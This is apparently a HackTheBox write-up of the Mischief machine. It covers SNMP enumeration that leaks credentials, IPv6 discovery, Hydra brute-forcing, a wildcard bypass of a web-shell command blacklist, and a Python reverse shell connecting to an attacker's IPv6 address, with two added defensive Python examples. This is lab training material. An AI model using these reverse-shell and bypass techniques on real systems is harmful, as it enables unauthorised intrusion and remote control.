Mischief-HackTheBox-WriteUp

Hello people,

First writeup for an Insane box! Learned tons from this machine!

It uses so many basic enumeration techniques that are crucial to building a strong methodology.

To such an extent that the box feels easy in parts just by enumerating tightly.

There is a cool combo with two wee scripts by 0xdf; they can be used to enumerate and execute bash commands through an RCE vector. They are very fun and a great foundation for your future scripts and for improving recon in general.

I also used a few tricks from GatoGamer1155, this guy makes some of the best content in the Hispano-American scene.

And tons of documentation about SNMP: understanding deeply how this protocol is used and how its components communicate is crucial.

MIBs are so important that you should have their packages installed on every setup by default.

SNMP agent architecture patterns, with tons of documentation for enumerating all their daemons.

The way this protocol can behave as a proxy between IPv4 and IPv6 interfaces.

The SNMP version on this box is v2c, while the latest version is v3. The latter has an improved way of authenticating, with encryption on top, but we are not worried about that here.

Very good machine to recommend if someone asks me for the best first Insane machine to start with, so far.

After starting, as always, by creating a directory to work on the machine and running the first nmap scan.

Just port 22 and port 3366, running HTTP.

We can take a look at port 3366. But there are barely any records, just something on adminsub.

The screen just prints some Trojan reports from the past. The HTTP service is a login page on a Python SimpleHTTPServer.

Curl it to check the response

curl -s -k -v -i 10.10.10.92:3366

It's asking for authentication, and the response is in plain text: a Python Radicale calendar and contacts server. Seems like some kind of office device, based on a contact list for login sessions and a calendar for scheduled tasks and days of the week.

It must be managed somehow. Maybe from a different interface or through a protocol we haven't looked at yet; let's check for UDP activity

sudo nmap -sU --top-ports 100 -T5 -v -n -Pn 10.10.10.92

Port 161 (SNMP) is open on UDP

#Look closely
sudo nmap -sU -p 161 -sC 10.10.10.92

Loki is hosting the show. UDP is leaking, and the HTTP server is leaking too: a process with PID 757 shows the password in plaintext, right in front of us.

Can we get a webshell?

An Apache process is also running, without any known open ports. Maybe it is bound locally, for an internal network?

We can even see the systemd PID.

Let's log in with the credentials we got.

More credentials, same user name, different passwords. I can't SSH in.

Passwords are for logins, logins are sessions, and sessions run on services.

I can even see the systemd from the machine, I know it is also hosting an Apache server.

Maybe internally, or they may be using a different interface.

SNMP is an interesting protocol; if we want to enumerate it properly, we need to understand how it works.

Look at its components

Ask Chatgpt

  • SNMP agents: software agents or processes running on network devices that expose information about the device's status, configuration and performance. The data is organised according to the structure defined in MIBs.

  • SNMP managers: systems or applications used for network management; they send SNMP requests to SNMP agents to retrieve information or perform actions on network devices.

  • MIBs are used as a reference by both SNMP managers and agents to ensure that they understand the structure and meaning of the data being exchanged, making the information human-readable.

  • MIBs provide a standardized way to represent and describe the information that can be managed using SNMP.

They communicate using SNMP messages.

Looking at the wiki, it doesn't seem like we are dealing with SNMP v3.

MIB packages help make SNMP enumeration more efficient. You can request specific information from devices rather than retrieving entire tables of data, which reduces unnecessary network traffic. Instead of guessing OIDs or conducting exhaustive scans, you can refer to MIBs to understand the structure and hierarchy of managed objects, making enumeration more precise and targeted.

MIBs make SNMP data human-readable and provide the object names you use in commands to manage agents.

Download the packages and comment out the "mibs :" line in the SNMP config file (/etc/snmp/snmp.conf), so the MIBs are actually loaded

sudo apt install snmp-mibs-downloader

Worth reading HackTricks' article about SNMP pentesting and extra documentation about MIBs

#Big chunk
snmpwalk -v 2c -c public 10.10.10.92
#Process
snmpbulkwalk -v2c -c public 10.10.10.92 hrSWRunName
#Within the process
snmpbulkwalk -v2c -c public 10.10.10.92 hrSWRunTable | grep <PID>
#Interfaces
snmpbulkwalk -v2c -c public 10.10.10.92 ipAddressType

There is an IPv6 interface right there.

We can find more documentation about SNMP agents acting as proxies between IPv4 and IPv6.

There are plenty of references to this proxy feature.

They are also mentioned on the wiki page for software agents.

From the snmpbulkwalk scan:

Seems like there is an IPv6 address in that index if we regroup the bytes and delete the extra colons

"de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:34:6c"
#Delete the extra : (two bytes per group, and the run of zeros collapses to ::)
"dead:beef::250:56ff:feb9:346c"
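As an added example that is not part of the original writeup (and not 0xdf's or anyone else's tooling), here is a small Python parser for snmpbulkwalk output that does the two things discussed above from the defender's side: it flags processes whose argument list in hrSWRunParameters carries a credential, the same kind of exposure that leaked loki's password through PID 757, and it converts the ipAddressType index into a normal IPv6 address with the standard ipaddress module, the same regrouping done by hand just above. The sample walk output is constructed for the example (the process arguments and the password value are placeholders, not the box's real values); the line format is what Net-SNMP prints with MIBs loaded, and the secret heuristics are assumptions.

```python
# Added example (not from the original writeup): audit what a read-only SNMP
# community exposes by parsing snmpbulkwalk output. Sample data is constructed.
import ipaddress
import re

# One snmpbulkwalk line with MIBs loaded, e.g.
#   HOST-RESOURCES-MIB::hrSWRunName.757 = STRING: "python"
LINE_RE = re.compile(
    r'^(?P<mib>[\w-]+)::(?P<obj>\w+)\.(?P<index>.+?)\s=\s(?P<type>[\w-]+):\s?(?P<value>.*)$'
)

# Heuristics (assumed) for secrets in a process argument list: a keyword such
# as "password", or a user:pass token (a word, a colon, then a non-path word).
KEYWORD_RE = re.compile(r'(?i)(passw(or)?d|pwd|secret|token|apikey)')
USERPASS_RE = re.compile(r'(?<!\S)[A-Za-z_][\w.-]{0,31}:[^\s:/@]{4,}(?!\S)')

# ipAddressType indexes an IPv6 row as ipv6."de:ad:...": 16 colon-separated bytes.
IPV6_INDEX_RE = re.compile(r'^ipv6\."((?:[0-9a-f]{2}:){15}[0-9a-f]{2})"$')

# Constructed sample: the argv and the password are placeholders, not real values.
SAMPLE_WALK = """\
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunName.757 = STRING: "python"
HOST-RESOURCES-MIB::hrSWRunName.801 = STRING: "apache2"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: ""
HOST-RESOURCES-MIB::hrSWRunParameters.757 = STRING: "-m SimpleHTTPAuthServer 3366 loki:password-placeholder"
HOST-RESOURCES-MIB::hrSWRunParameters.801 = STRING: "-k start"
IP-MIB::ipAddressType.ipv4."10.10.10.92" = INTEGER: unicast(1)
IP-MIB::ipAddressType.ipv6."de:ad:be:ef:00:00:00:00:02:50:56:ff:fe:b9:34:6c" = INTEGER: unicast(1)
"""


def parse_snmp_line(line):
    """Parse one snmpbulkwalk line into a dict, or None if it is not a varbind."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    value = rec["value"]
    if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
        value = value[1:-1]          # strip the quotes Net-SNMP puts around STRING values
    rec["value"] = value
    return rec


def parse_walk(text):
    """Parse a whole walk, skipping blank or unparseable lines."""
    return [r for r in (parse_snmp_line(l) for l in text.splitlines()) if r]


def index_to_ipv6(index):
    """Turn an index like ipv6."de:ad:..." into a compressed IPv6 address, else None."""
    m = IPV6_INDEX_RE.match(index)
    if not m:
        return None
    packed = bytes.fromhex(m.group(1).replace(":", ""))   # 16 raw bytes
    return str(ipaddress.IPv6Address(packed))               # ipaddress does the grouping


def find_ipv6_addresses(records):
    """All IPv6 addresses the agent reports in IP-MIB::ipAddressType."""
    out = []
    for r in records:
        if r["obj"] == "ipAddressType":
            addr = index_to_ipv6(r["index"])
            if addr:
                out.append(addr)
    return out


def find_exposed_secrets(records):
    """(pid, name, params) for every process whose argv looks like it holds a secret."""
    names = {r["index"]: r["value"] for r in records if r["obj"] == "hrSWRunName"}
    hits = []
    for r in records:
        if r["obj"] != "hrSWRunParameters":
            continue
        params = r["value"]
        if KEYWORD_RE.search(params) or USERPASS_RE.search(params):
            hits.append((int(r["index"]), names.get(r["index"], "?"), params))
    return hits


if __name__ == "__main__":
    recs = parse_walk(SAMPLE_WALK)
    for pid, name, params in find_exposed_secrets(recs):
        print(f"[!] pid {pid} ({name}) exposes a secret in its argv: {params}")
    for addr in find_ipv6_addresses(recs):
        print(f"[*] IPv6 address reported via IP-MIB: {addr}")
```

Feed it the real output of the snmpbulkwalk commands above (snmpbulkwalk ... hrSWRunTable and ... ipAddressType) instead of SAMPLE_WALK; anything it flags is a secret that any holder of the read-only community string can read, which is the exact finding that opens this box.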

Running nmap against the IPv6 address, we get ports 22 and 80 open.

Add it to /etc/hosts or use [ipv6] directly, it's up to you, and check the HTTP server.

Can't use the credentials that we got ---> loki:trickeryanddeceit

But I can brute-force with Hydra

hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P passwords.txt mischief.htb http-post-form "/login.php:user=^USER^&password=^PASS^:Sorry"

There is a match for administrator.

We have command execution, but some programs are blacklisted, and the word "credentials" is also blacklisted.

0xdf wrote a cool script to enumerate the commands that are not blacklisted, using curl

#!/bin/bash
#By 0xdf
#Create a list with the commands you want to test (one per line) and give it as the argument.
#Replace IPV6 with the target address and IDNUM with your PHPSESSID cookie value.

command_file=$1
while read -r cmd; do
    # The app answers "Command is not allowed." for anything on its blacklist
    if curl -s -6 -X POST "http://[IPV6]:80/" -H "Cookie: PHPSESSID=IDNUM" -d "command=${cmd}" | grep -q "Command is not allowed."; then
        echo -e "  \e[41m${cmd}\e[49m blocked"
    else
        echo -e "  \e[42m${cmd}\e[49m allowed"
    fi
done < "${command_file}"

By creating a list we can enumerate what the application allows.

Now we can use his second script to execute commands. These two scripts are a very good base for further modification depending on the situation, and make a really good combo

#!/bin/bash
#By 0xdf. Usage: ./cmd.sh <ipv6 address> "<command>"
#Sends the command to the web shell and prints only its output, dropping the
#closing </html> tag and the app's success banner.

ip=$1
cmd=$2

curl -s -6 -X POST "http://[${ip}]:80/" -d "command=${cmd};" | grep -F "</html>" -A 10 | grep -vF -e "</html>" -e "Command was executed succesfully!"

0xdf uses the wildcard character ? to get around the filename being blacklisted and still read the file, putting the actual filename inside "" when doing the curl request.

GatoGamer1155 uses a similar technique, but with * directly on the web shell.

Simple, cool tricks that we can pull off after having done strong enumeration.
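To show the defensive side of the filter bypass just described, here is an added example (not code from the original writeup, from 0xdf, from GatoGamer1155 or from the box itself) that puts a denylist command filter of the kind the web shell uses next to an allow-list design that is not affected by wildcards. The blocked-word set, the menu of allowed commands and the function names are assumptions for illustration.

```python
# Added example (not the box's code): a denylist command filter beside an
# allow-list design. The word lists and names below are assumptions.
import shlex
import subprocess

# Assumed denylist, in the spirit of the web shell's blocked words.
BLOCKED_WORDS = {"cat", "credentials", "nc", "python"}


def denylist_allows(command):
    """Weak check: refuse only when a blocked word appears literally in the raw string."""
    return not any(word in command for word in BLOCKED_WORDS)


def denylist_run(command, runner=subprocess.run):
    """Vulnerable pattern: the whole user string goes to /bin/sh after the check.
    Glob characters such as ? and * are expanded by the shell, after the filter
    ran, so the names the filter looked for never appear in the string it saw."""
    if not denylist_allows(command):
        return None
    return runner(command, shell=True, capture_output=True, text=True, timeout=5).stdout


# Allow-list: the user picks a menu keyword, the server supplies the argv.
ALLOWED_COMMANDS = {
    "uptime": ["uptime"],
    "disk": ["df", "-h"],
    "mem": ["free", "-m"],
}


def allowlist_argv(user_input):
    """Return the fixed argv for a menu keyword, or None for anything else.
    shlex.split makes 'mem; id' or 'mem && id' more than one token, so it is
    rejected; nothing the user typed ever reaches a shell or becomes an argument."""
    try:
        tokens = shlex.split(user_input)
    except ValueError:            # unbalanced quotes
        return None
    if len(tokens) != 1:
        return None
    return ALLOWED_COMMANDS.get(tokens[0])


def allowlist_run(user_input, runner=subprocess.run):
    """Run the fixed argv without a shell; None means the request was refused."""
    argv = allowlist_argv(user_input)
    if argv is None:
        return None
    return runner(argv, shell=False, capture_output=True, text=True, timeout=5).stdout


if __name__ == "__main__":
    for probe in ("cat /home/loki/credentials", "c?t /home/loki/cred*", "mem", "mem; id"):
        verdict = "pass" if denylist_allows(probe) else "blocked"
        print(f"{probe!r:32} denylist: {verdict:8} allowlist argv: {allowlist_argv(probe)}")
```

The second probe shows the structural problem: the denylist passes it because the literal words are absent, and the shell would rebuild them afterwards. The allow-list never inspects the text for bad words at all; it only asks whether the whole input is one of a few known keywords, so there is nothing for a wildcard to work on.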

Dope, this way we can SSH in as loki and get the user flag.

Every time you want to escalate your privileges, build the good habit of running commands to enumerate files and permissions

#SUID
find / -perm -4000 -type f 2>/dev/null 

#Passwords
grep -iR "pass" *
grep -r "password" .

In this case, looking at the SUIDs we can find multiple vectors that could be exploited.

pkexec can be used for PwnKit. And probably more if you dig through the binaries on GTFOBins.

The Python server keeps leaking passwords, this time in the bash history.

You could use the history command itself and you would see the password close to free -mt.

Good practice: always check the bash history.

Another simple way to keep enumerating binaries is by using getfacl.

We can use the previous script from 0xdf to enumerate su and sudo on the web shell.

Green light means we should be rooting with the leaked password.

We just need to get the web shell first; shouldn't be too hard to get a reverse shell.

Make sure you have a proper setup to set listeners on IPv6.

You can try having netcat-openbsd configured properly, or just use socat, which provides an easier way to listen on IPv6 from the get-go

socat TCP6-LISTEN:1234,bind=::,fork -

Craft the payload easily by grabbing an IPv6 Python reverse shell. You can take a regular revshell, change AF_INET to AF_INET6 and add ; at the end

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("IPV6",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

#Add your IPv6 address and port, and remember to add ; at the end
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::1010",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Execute

The flag is not around, but we can enumerate files like champs

find / -name root.txt 2>/dev/null